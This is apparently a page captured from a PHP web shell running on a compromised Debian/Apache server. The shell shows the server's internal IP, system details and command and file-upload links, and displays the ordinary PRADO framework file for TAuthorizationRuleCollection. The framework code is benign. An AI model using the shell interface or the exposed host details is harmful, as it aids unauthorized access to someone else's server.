|
Server IP : 10.2.73.233 / Your IP : 216.73.216.59 Web Server : Apache/2.4.59 (Debian) System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 User : www-data ( 33) PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ifk/web/assets/../prado4.3.2/Security/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* TAuthorizationRule, TAuthorizationRuleCollection class file
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @link https://github.com/pradosoft/prado
* @license https://github.com/pradosoft/prado/blob/master/LICENSE
*/
namespace Prado\Security;
use Prado\Exceptions\TInvalidDataTypeException;
/**
* TAuthorizationRuleCollection class.
* TAuthorizationRuleCollection represents a collection of authorization rules {@link TAuthorizationRule}.
* To check if a user is allowed, call {@link isUserAllowed}.
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @since 3.0
*/
class TAuthorizationRuleCollection extends \Prado\Collections\TPriorityList
{
/**
* @param IUser $user the user to be authorized
* @param string $verb verb, can be empty, 'post' or 'get'.
* @param string $ip the request IP address
* @param null|array $extra
* @return bool whether the user is allowed
*/
public function isUserAllowed($user, $verb, $ip, $extra = null)
{
if ($user instanceof IUser) {
$verb = strtolower(trim($verb));
foreach ($this as $rule) {
if (($decision = $rule->isUserAllowed($user, $verb, $ip, $extra)) !== 0) {
return ($decision > 0);
}
}
return true;
} else {
return false;
}
}
/**
* Inserts an item at the specified position.
* This overrides the parent implementation by performing additional
* operations for each newly added TAuthorizationRule object.
* @param int $index the specified position.
* @param mixed $item new item
* @throws TInvalidDataTypeException if the item to be inserted is not a TAuthorizationRule object.
*/
public function insertAt($index, $item)
{
if ($item instanceof TAuthorizationRule) {
parent::insertAtIndexInPriority($item, $index);
} else {
throw new TInvalidDataTypeException('authorizationrulecollection_authorizationrule_required');
}
}
}